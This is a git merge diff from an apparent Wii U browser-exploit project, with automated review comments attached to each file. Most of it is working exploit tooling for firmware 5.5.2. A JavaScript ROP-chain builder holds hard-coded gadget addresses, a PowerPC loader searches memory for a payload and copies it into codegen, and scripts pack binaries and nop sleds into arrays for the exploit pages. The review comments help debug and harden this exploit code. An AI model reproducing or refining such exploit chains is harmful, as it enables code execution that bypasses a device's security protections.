
Merge branch 'master' of github:jumpcallpop/wiiutest into upsteam-master

 Conflicts:
	index.html (kept ours)
	payload/exploit-old.html (used theirs)
pull/3/head
c? 2 years ago
parent
commit
80ab0b3aca

BIN
a.out View File


+ 22
- 23
codebin2js.py View File

@@ -1,47 +1,46 @@
import struct
import os

j = 0;

"""
for i in range(0x2000):
print "0x90, ",
if i%32 == 31:
print ""
"""
print "["
j = 0;

payload = ""
try:
f = open("wiiuhaxx_loader.bin", "rb")
while True:
B = struct.unpack(">B", f.read(1))[0];
print "0x%02x," % (B),
payload += "0x%02x, " % (B)
j+=1
except:
print ""
payload += "\n"

for i in range(j&0x03):
print "0x00, "
print ""
payload += "0x00, "
payload += "\n"

#print "0x48, 0x00, 0x00, 0x05, 0x7c, 0x68, 0x02, 0xa6, 0x38, 0x80, 0x00, 0x48, 0x7c, 0x84, 0x1a, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x7f, 0xa3, 0xeb, 0x78, 0x38, 0xc0, 0x00, 0x02, 0x7c, 0xa5, 0x34, 0x30, 0x7c, 0xa9, 0x03, 0xa6, 0x80, 0xa4, 0x00, 0x00, 0x90, 0xa3, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x38, 0x63, 0x00, 0x04, 0x42, 0x00, 0xff, 0xf0, 0x7c, 0x21, 0xf2, 0x14, 0x80, 0x61, 0x00, 0x04, 0x7c, 0x69, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x20,"
print "0x00, 0x40, 0x00, 0x00,"
payload += "0x00, 0x40, 0x00, 0x00,\n"
j+=4
try:
f = open("code550.bin", "rb")
while True:
B = struct.unpack(">B", f.read(1))[0];
print "0x%02x," % (B),
payload += "0x%02x, " % (B)
j+=1
except:
print ""
payload += ""
for i in range(j&0x03):
print "0x00,",
print ""
payload += "0x00,"
payload += "\n"

#nop
nop = "";
for i in range(j, 0x4000-4, 4):
nop += "0x60, 0x00, 0x00, 0x00, "
nop += "\n"

#padding
for i in range(j, 0x4000-4):
print "0x90,",
print ""
print "["
print nop
print payload
print "]"
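Review bot: The alignment padding `for i in range(j&0x03)` appends `j & 3` bytes, which is the remainder rather than the bytes needed to reach the next word boundary — a 5-byte input gets 1 pad byte (6 total) instead of 3, so every PPC word that follows (the `0x00, 0x40, 0x00, 0x00` marker and `code550.bin`) lands misaligned, and neither padding loop adds its pad count to `j`. Use `pad = (-j) % 4` and `j += pad` in both places. The bare `except:` that ends each read loop is relying on `struct.error` at EOF, but it also swallows a missing or unreadable file, so a typo in `"wiiuhaxx_loader.bin"` silently yields an empty payload; catch `struct.error` only (or read the whole file once and iterate a `bytearray`) and open the files with `with` so they are closed. These loops appear on both the old and new side of the hunk, so this is pre-existing rather than introduced here.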

+ 43
- 0
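--- a/codebin2js_DEV.py
+++ b/codebin2js_DEV.py
@@ -0,0 +1,43 @@
+import struct
+
+j = 0;
+
+payload = "[\n"
+"""
+try:
+f = open("wiiuhaxx_loader.bin", "rb")
+while True:
+B = struct.unpack(">B", f.read(1))[0];
+payload += "0x%02x, " % (B)
+j+=1
+except:
+payload += "\n"
+
+for i in range(j&0x03):
+payload += "0x00, "
+payload += "\n"
+
+#print "0x48, 0x00, 0x00, 0x05, 0x7c, 0x68, 0x02, 0xa6, 0x38, 0x80, 0x00, 0x48, 0x7c, 0x84, 0x1a, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x7f, 0xa3, 0xeb, 0x78, 0x38, 0xc0, 0x00, 0x02, 0x7c, 0xa5, 0x34, 0x30, 0x7c, 0xa9, 0x03, 0xa6, 0x80, 0xa4, 0x00, 0x00, 0x90, 0xa3, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x38, 0x63, 0x00, 0x04, 0x42, 0x00, 0xff, 0xf0, 0x7c, 0x21, 0xf2, 0x14, 0x80, 0x61, 0x00, 0x04, 0x7c, 0x69, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x20,"
+payload += "0x00, 0x10, 0x00, 0x00,\n"
+j+=4
+"""
+try:
+f = open("codeloader.bin", "rb")
+while True:
+B = struct.unpack(">B", f.read(1))[0];
+payload += "0x%02x, " % (B)
+j+=1
+except:
+payload += ""
+for i in range(j&0x03):
+payload += "0x00,"
+payload += "\n"
+
+#padding
+for i in range(j, 0x1000-4, 4):
+payload += "0x60, 0x00, 0x00, 0x00, "
+payload += "\n"
+payload += "]"
+
+print payload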
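Review bot: The word-alignment pad `for i in range(j&0x03)` emits `j & 3` bytes instead of `(4 - j % 4) % 4`, and `j` is never bumped for them, so whenever codeloader.bin is not a multiple of 4 bytes the `0x60000000` nop sled that follows starts off-alignment and the emitted array is not the intended 0x1000 bytes. The padding loop `range(j, 0x1000-4, 4)` is also silently empty when the loader is larger than 0xFFC bytes, so an oversized loader produces an array that no longer fits the region the JS side expects with no warning. The bare `except:` is being used as the EOF condition, which also hides a missing file and leaves the handle open. A read-whole-file form fixes all three:

```python
with open("codeloader.bin", "rb") as f:
    data = bytearray(f.read())
payload += "".join("0x%02x, " % b for b in data)
j = len(data)
# pad to the next 4-byte boundary so the nop sled below stays word-aligned
pad = (-j) % 4
payload += "0x00," * pad + "\n"
j += pad
if j > 0x1000 - 4:
    raise SystemExit("codeloader.bin (%d bytes) does not fit in the 0x1000-byte region" % j)
# ... unchanged: nop padding loop, closing "]" and print ...
```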

+ 8
- 0
index.html View File

@@ -5,6 +5,7 @@ body{background:#222;color:#fff;}
a{color:009ac7;}
</style>
<div class="align">
<<<<<<< HEAD
<h2>stUpiidhax: Wii U 5.5.2 browser pwn</h2>
<a href="payload/exploit.html"><h1>Exploit</h1></a>
<h2>
@@ -24,4 +25,11 @@ Try the big exploit button a few times first. Clearing your browser save data or
This service provided by <a href="https://twitter.com/ColtonDRG">ColtonDRG</a>. <a href="https://github.com/coltondrg/stupiidhax">Source for this site</a>.<br/>
All the real work was done by the <a href="https://gbatemp.net/threads/webhack-on-5-5-2.480938/">the smart people on this thread's OP</a><br/>
git commit <!--#include file="commit.html" -->
=======
<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
<a href="payload/exploit_WORKING.html"><h1>Exploit WORKING</h1></a><br/>
<a href="payload/exploit.html"><h1>Exploit DEV</h1></a><br/>
>>>>>>> 77dd2dbe58d4f174656bbac43350417947b294be
</div>
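Review bot: The conflict markers `<<<<<<< HEAD`, `=======` and `>>>>>>> 77dd2dbe58d4f174656bbac43350417947b294be` are committed into the page, so a browser renders both branches' link lists plus the literal marker text; the commit message says index.html was resolved as "kept ours", but this hunk shows it was not. Delete the three marker lines and keep one of the two lists. Which list is "ours" is not recoverable from the hunk alone — the `Exploit` link and the credits line look like the HEAD side — so confirm against the branch before picking. Unrelated but visible in the context, `a{color:009ac7;}` is missing the leading `#`, so the link colour is ignored.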

+ 4
- 0
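--- a/miniloader/build_codeloader.bat
+++ b/miniloader/build_codeloader.bat
@@ -0,0 +1,4 @@
+#Assemble the codeloader and extract the code section to codeloader.bin
+powerpc-eabi-as -mregnames codeloader.s -o codeloader.o
+powerpc-eabi-ld -Ttext 0x80000000 codeloader.o
+powerpc-eabi-objcopy -O binary codeloader.o codeloader.bin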
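Review bot: `#Assemble …` is not a comment in a .bat file — cmd tries to execute a program named `#Assemble` and prints an error before continuing; use `REM Assemble the codeloader and extract the code section to codeloader.bin`. The `ld` line has no `-o`, so the linked image goes to `a.out` (which this commit does add at the repository root), and the following `objcopy` then strips the unlinked `codeloader.o` instead, so `-Ttext 0x80000000` never reaches codeloader.bin; this seems to work only because codeloader.s uses relative branches and `blr` exclusively. Change the last two lines to `powerpc-eabi-ld -Ttext 0x80000000 codeloader.o -o codeloader.elf` and `powerpc-eabi-objcopy -O binary codeloader.elf codeloader.bin`, and drop the stray `a.out` from the repo.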

BIN
miniloader/codeloader.bin View File


BIN
miniloader/codeloader.o View File


+ 196
- 0
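--- a/miniloader/codeloader.s
+++ b/miniloader/codeloader.s
@@ -0,0 +1,196 @@
+# This is a program written in PPC to search address range 1C000000-1D000000
+# for the magic "LOOKHERE", then load the code based on the format
+
+#Format to load:
+# struct PAYLOAD{
+# char magic[8]; // "LOOKHERE"
+# uint32 size; // Size of code
+# byte code[size]; // Raw PPC to load
+# }
+
+#Set up register aliases to make the code more readable
+.set r0, 0
+.set r1, 1
+.set r2, 2
+.set r3, 3
+.set r4, 4
+.set r5, 5
+.set r6, 6
+.set r7, 7
+.set r8, 8
+.set r9, 9
+.set r10, 10
+.set r11, 11
+.set r12, 12
+.set r13, 13
+.set r14, 14
+.set r15, 15
+.set r16, 16
+.set r17, 17
+.set r18, 18
+.set r19, 19
+.set r20, 20
+.set r21, 21
+.set r22, 22
+.set r23, 23
+.set r24, 24
+.set r25, 25
+.set r26, 26
+.set r27, 27
+.set r28, 28
+.set r29, 29
+.set r30, 30
+.set r31, 31
+
+#load address range to search
+lis r7, 0x1B00 #r7 = 1C000000
+lis r8, 0x1D00 #r8 = 1D000000
+
+#Load "LOOK" in r9
+lis r9, 0x4C4F
+ori r9, r9, 0x4F4B
+
+#Load "HERE" in r10
+lis r10, 0x4845
+ori r10, r10, 0x5245
+
+loop_start:
+#Check if the first word at r7 is equal to "LOOK" (r9)
+lwz r11, 0(r7)
+cmpw r11, r9
+bne not_equal #If not, restart loop
+
+#Check if second word at r7 is equal to "HERE" (r10)
+lwz r11, 4(r7)
+cmpw r11, r10
+beq found #If so, exit the loop and load the code
+
+#If "LOOKHERE" is not located at r7
+not_equal:
+#Increment by one word
+addi r7, r7, 4
+cmpw r7, r8 #Check if the counter (r7) is out of search range
+bge not_found #If out of range, exit loop and kill program
+b loop_start #If still in range, restart loop
+
+
+found:
+#Setup r11 as payloadSize and r7 as payloadAddress
+lwz r11, 8(r7)
+addi r7, r7, 0xC
+
+#Set up ROP chain to copy our code to codegen (we can't be executing from JIT while copying to JIT)
+#See ropChainToAsm.py for in-order ROP chain
+li r10, 0x0000
+stw r10, 0x0(r1)
+stw r10, 0x8(r1)
+stw r10, 0xC(r1)
+stw r10, 0x10(r1)
+stw r10, 0x14(r1)
+stw r10, 0x18(r1)
+stw r10, 0x24(r1)
+stw r10, 0x28(r1)
+stw r10, 0x2C(r1)
+stw r10, 0x30(r1)
+stw r10, 0x38(r1)
+stw r10, 0x3C(r1)
+stw r10, 0x40(r1)
+stw r10, 0x44(r1)
+stw r10, 0x48(r1)
+stw r10, 0x50(r1)
+stw r10, 0x54(r1)
+stw r10, 0x58(r1)
+stw r10, 0x60(r1)
+stw r10, 0x70(r1)
+stw r10, 0x78(r1)
+stw r10, 0x80(r1)
+stw r10, 0x84(r1)
+stw r10, 0x88(r1)
+stw r10, 0x8C(r1)
+stw r10, 0x90(r1)
+stw r10, 0x98(r1)
+stw r10, 0x9C(r1)
+stw r10, 0xA0(r1)
+stw r10, 0xA4(r1)
+stw r10, 0xA8(r1)
+stw r10, 0xB8(r1)
+stw r10, 0xBC(r1)
+stw r10, 0xC0(r1)
+stw r10, 0xC8(r1)
+stw r10, 0xCC(r1)
+stw r10, 0xD0(r1)
+stw r10, 0xD4(r1)
+stw r10, 0xD8(r1)
+stw r10, 0xE0(r1)
+stw r10, 0xE4(r1)
+stw r10, 0xE8(r1)
+stw r10, 0xEC(r1)
+stw r10, 0xF0(r1)
+stw r10, 0x100(r1)
+stw r10, 0x108(r1)
+stw r10, 0x110(r1)
+stw r10, 0x114(r1)
+stw r10, 0x118(r1)
+stw r10, 0x11C(r1)
+stw r10, 0x120(r1)
+stw r10, 0x128(r1)
+stw r10, 0x12C(r1)
+stw r10, 0x130(r1)
+stw r10, 0x134(r1)
+stw r10, 0x138(r1)
+stw r10, 0x148(r1)
+stw r10, 0x150(r1)
+stw r10, 0x158(r1)
+li r10, 0x0001
+stw r10, 0xB4(r1)
+lis r10, 0x0102
+ori r10, r10, 0x04C8
+stw r10, 0x4(r1)
+stw r10, 0x4C(r1)
+stw r10, 0x94(r1)
+stw r10, 0xDC(r1)
+stw r10, 0x124(r1)
+lis r10, 0x0102
+ori r10, r10, 0x3F88
+stw r10, 0xF8(r1)
+lis r10, 0x0102
+ori r10, r10, 0x40B0
+stw r10, 0x140(r1)
+lis r10, 0x0103
+ori r10, r10, 0x5FC8
+stw r10, 0x68(r1)
+lis r10, 0x0103
+ori r10, r10, 0x76C0
+stw r10, 0x20(r1)
+stw r10, 0xB0(r1)
+lis r10, 0x0107
+ori r10, r10, 0xDD70
+stw r10, 0x1C(r1)
+stw r10, 0x64(r1)
+stw r10, 0xAC(r1)
+stw r10, 0xF4(r1)
+stw r10, 0x13C(r1)
+lis r10, 0x0108
+ori r10, r10, 0x0274
+stw r10, 0x34(r1)
+stw r10, 0x7C(r1)
+stw r10, 0xC4(r1)
+stw r10, 0x10C(r1)
+stw r10, 0x154(r1)
+lis r10, 0x0180
+stw r10, 0x6C(r1)
+stw r10, 0xFC(r1)
+stw r10, 0x144(r1)
+stw r10, 0x15C(r1)
+stw r7, 0x74(r1)
+stw r11, 0x5C(r1)
+stw r11, 0x104(r1)
+stw r11, 0x14C(r1)
+
+#Start ROP
+lwz r0, 0x4(r1)
+mtlr r0
+blr
+
+not_found:
+blr #RIP, no payload found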
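Review bot: `lis r7, 0x1B00` loads 0x1B000000 while its own comment and the file header say the scan starts at 0x1C000000; one of the two is wrong, and if 0x1B000000-0x1BFFFFFF is not mapped the very first `lwz r11, 0(r7)` faults before the advertised range is reached, so either change it to `lis r7, 0x1C00` or fix the comment. The size word taken by `lwz r11, 8(r7)` comes straight from memory and is stored unchecked into the memcpy, DCFlushRange and ICInvalidateRange argument slots (0x5C, 0x104, 0x14C), so any stray or malformed "LOOKHERE" header with a large size copies past the codegen region at 0x01800000; add an upper-bound check right after the load, e.g. `cmplwi r11, <codegen size>` / `bgt not_found` — the region size is not visible here, so take it from OSGetCodegenVirtAddrRange rather than guessing. Minor: at the last word of the range `lwz r11, 4(r7)` reads 0x1D000000, one word past the stated end.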

+ 40
- 0
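--- a/miniloader/ropChainToAsm.py
+++ b/miniloader/ropChainToAsm.py
@@ -0,0 +1,40 @@
+# Assemble rop chain into semi-optimized ppc to write over the stack
+# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
+# FFFF2222 is a stand in for the payload load address (stored in r7)
+# FFFF3333 is a stand in for the payload size (stored in r11)
+# place at "found:" in codeloader.s
+
+
+#This ROP chain was created using:
+# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
+# ropchain_appendu32(0x01800000)
+# in ropchainBuilder.html
+ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
+ropChainAddresses = []
+for i in ropChain:
+if not i in ropChainAddresses:
+ropChainAddresses.append(i)
+
+# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
+# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
+writeRegister = ''
+for address in ropChainAddresses:
+if address == 'FFFF2222':
+writeRegister = 'r7'
+elif address == 'FFFF3333':
+writeRegister = 'r11'
+elif address[:4] == '0000':
+print('li r10, 0x'+address[4:])
+writeRegister = 'r10'
+else:
+print('lis r10, 0x'+address[:4])
+if address[4:] != "0000":
+print('ori r10, r10, 0x'+address[4:])
+
+last = ropChain.index(address)
+while last != -1:
+print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
+try:
+last = ropChain.index(address, last+1)
+except ValueError:
+last = -1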
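Review bot: The `else:` branch that emits `lis`/`ori` never resets `writeRegister`, so a value that follows `FFFF3333` or `FFFF2222` in first-occurrence order is stored from the stale register: in this chain `01035FC8` (memcpy) and `01800000` come right after `FFFF3333`, so the script emits `stw r11, 0x68(r1)` and `stw r11, 0x6C(r1)` — the payload size where the memcpy gadget and codegen address belong — instead of the freshly loaded r10. Add `writeRegister = 'r10'` under `else:` next to the `lis` print. The checked-in codeloader.s uses r10 for those slots, so it was evidently fixed by hand; re-run the script after the change and diff it against the .s. The `.index`/`ValueError` walk could simply be `for slot, val in enumerate(ropChain): if val == address: print('stw %s, 0x%X(r1)' % (writeRegister, slot * 4))`.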

+ 131
- 0
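--- a/miniloader/ropchainBuilder.html
+++ b/miniloader/ropchainBuilder.html
@@ -0,0 +1,131 @@
+<!--
+This is just something for me to use a console on chrome to form ROP chains
+-->
+<script>
+//Rop offset
+{
+ROP_POPJUMPLR_STACK12 = 0x0101cd24;
+ROP_POPJUMPLR_STACK20 = 0x01024d88;
+ROP_CALLFUNC = 0x01080274;
+ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
+ROP_POP_R28R29R30R31 = 0x0101d8d4;
+ROP_POP_R27 = 0x0101cb00;
+ROP_POP_R24_TO_R31 = 0x010204c8;
+ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
+ROP_SETR3TOR31_POP_R31 = 0x0101cc10;
+
+ROP_memcpy = 0x01035fc8;
+ROP_DCFlushRange = 0x01023f88;
+ROP_ICInvalidateRange = 0x010240b0;
+ROP_OSSwitchSecCodeGenMode = 0x010376c0;
+ROP_OSCodegenCopy = 0x010376d8;
+ROP_OSGetCodegenVirtAddrRange = 0x010375c0;
+ROP_OSGetCoreId = 0x01024e8c;
+ROP_OSGetCurrentThread = 0x01043150;
+ROP_OSSetThreadAffinity = 0x010429dc;
+ROP_OSYieldThread = 0x010418e4;
+ROP_OSFatal = 0x01031618;
+ROP_Exit = 0x0101cd80;
+ROP_OSScreenFlipBuffersEx = 0x0103afd0;
+ROP_OSScreenClearBufferEx = 0x0103b090;
+ROP_OSDynLoad_Acquire = 0x0102a3b4;
+ROP_OSDynLoad_FindExport = 0x0102b828;
+ROP_os_snprintf = 0x0102f160;
+}
+
+//Rop helper
+{
+var ab = new ArrayBuffer(0x10000);
+var ropCurrentDv = new DataView(ab)
+var ropChain = new Uint32Array(ab);
+var ropCurrentOffset = 0;
+
+function ropchain_appendu32(val)
+{
+ropCurrentDv.setUint32(ropCurrentOffset, val);
+ropCurrentOffset += 4;
+}
+
+function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
+{
+ropchain_appendu32(ROP_POP_R24_TO_R31);
+ropchain_appendu32(0x0);
+ropchain_appendu32(0x0);
+
+ropchain_appendu32(r24);
+ropchain_appendu32(r25);
+ropchain_appendu32(r26);
+ropchain_appendu32(r27);
+ropchain_appendu32(r28);
+ropchain_appendu32(r29);
+ropchain_appendu32(r30);
+ropchain_appendu32(r31);
+
+ropchain_appendu32(0x0);
+}
+
+function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
+{
+ropgen_pop_r24_to_r31(r6, r5, 0, ROP_CALLR28_POP_R28_TO_R31, funcaddr, r3, 0, r4);
+
+ropchain_appendu32(ROP_CALLFUNC);
+
+ropchain_appendu32(r28);//r28
+ropchain_appendu32(0x0);//r29
+ropchain_appendu32(0x0);//r30
+ropchain_appendu32(0x0);//r31
+ropchain_appendu32(0x0);
+}
+
+function ropgen_switchto_core1()
+{
+ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
+
+ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
+
+ropchain_appendu32(ROP_OSYieldThread);//r28
+ropchain_appendu32(0x0);//r29
+ropchain_appendu32(0x0);//r30
+ropchain_appendu32(0x0);//r31
+ropchain_appendu32(0x0);
+
+ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);
+
+ropchain_appendu32(0x0);//r28
+ropchain_appendu32(0x0);//r29
+ropchain_appendu32(0x0);//r30
+ropchain_appendu32(0x0);//r31
+ropchain_appendu32(0x0);
+}
+
+function ropgen_OSSwitchSecCodeGenMode(flag)//flag0 == RW- permissions, flag1 == R-X permissions.
+{
+ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, 0x0, 0x0, 0x0, 0x0);
+}
+
+function ropgen_memcpy(dst, src, size)
+{
+ropgen_callfunc(ROP_memcpy, dst, src, size, 0x0, 0x0);
+}
+
+function ropgen_DCFlushRange(addr, size)
+{
+ropgen_callfunc(ROP_DCFlushRange, addr, size, 0x0, 0x0, 0x0);
+}
+
+function ropgen_ICInvalidateRange(addr, size)
+{
+ropgen_callfunc(ROP_ICInvalidateRange, addr, size, 0x0, 0x0, 0x0);
+}
+
+function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
+{
+ropgen_OSSwitchSecCodeGenMode(0);
+ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
+ropgen_OSSwitchSecCodeGenMode(1);
+
+ropgen_DCFlushRange(codegen_addr, codebin_size);
+ropgen_ICInvalidateRange(codegen_addr, codebin_size);
+}
+}
+</script>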
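Review bot: `ropchain_appendu32` writes through `ropCurrentDv.setUint32` with the default big-endian order, but `ropChain` is a `Uint32Array` over the same buffer and reads in host order, so on the little-endian PC this console helper runs on, dumping `ropChain` shows every word byte-swapped (`0x010204C8` reads back as `0xC8040201`); the values in ropChainToAsm.py are in the correct order, so the chain was presumably read back some other way, but the trap is one line from biting. Make the intent explicit with `ropCurrentDv.setUint32(ropCurrentOffset, val, false); // big-endian for the PPC target — do not read back through ropChain on x86`, or drop the unused `Uint32Array` view. The `ROP_*` table carries no note of which firmware build these addresses belong to; a header comment naming the target version (index.html says 5.5.2, this looks lifted from yellows8's wiiuhaxx_common — confirm) would save the next person a bad guess. All the names are created as implicit globals inside bare `{}` blocks; `const` would fail loudly under strict mode instead of silently overwriting an existing global.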

+ 3
- 2
payload.js
File diff suppressed because it is too large


BIN
payload/boot.elf View File


BIN
payload/boot_.elf View File


+ 59
- 48
payload/exploit-old.html
File diff suppressed because it is too large


+ 244
- 0
payload/exploit_WORKING.html
File diff suppressed because it is too large


+ 43
- 0
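--- a/ropChainToAsm.py
+++ b/ropChainToAsm.py
@@ -0,0 +1,43 @@
+# Assemble rop chain into semi-optimized ppc to write over the stack
+# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
+# FFFF2222 is a stand in for the payload load address (stored in r7)
+# FFFF3333 is a stand in for the payload size (stored in r11)
+# place at "found:" in codeloader.s
+
+
+#This ROP chain was created using:
+# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
+# ropchain_appendu32(0x01800000)
+# in ropchainBuilder.html
+ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
+
+#Generate a list of each value used in the ROP chain for optimization purposes
+#Cause no need to load the value in multiple times
+ropChainAddresses = []
+for i in ropChain:
+if not i in ropChainAddresses:
+ropChainAddresses.append(i)
+
+# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
+# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
+writeRegister = ''
+for address in ropChainAddresses:
+if address == 'FFFF2222':
+writeRegister = 'r7'
+elif address == 'FFFF3333':
+writeRegister = 'r11'
+elif address[:4] == '0000':
+print('li r10, 0x'+address[4:])
+writeRegister = 'r10'
+else:
+print('lis r10, 0x'+address[:4])
+if address[4:] != "0000":
+print('ori r10, r10, 0x'+address[4:])
+
+last = ropChain.index(address)
+while last != -1:
+print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
+try:
+last = ropChain.index(address, last+1)
+except ValueError:
+last = -1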
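Review bot: This is the same script as miniloader/ropChainToAsm.py with two comment lines added, and it carries the same defect: the `else:` branch prints `lis`/`ori` into r10 but never sets `writeRegister = 'r10'`, so `01035FC8` and `01800000`, which follow `FFFF3333` in first-occurrence order, are stored with `stw r11, …` — the payload size lands in the memcpy and codegen-address slots. Add `writeRegister = 'r10'` under `else:`. Keep one copy of the script (the miniloader/ one sits next to codeloader.s, which its header says it targets) so the fix is not needed twice.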
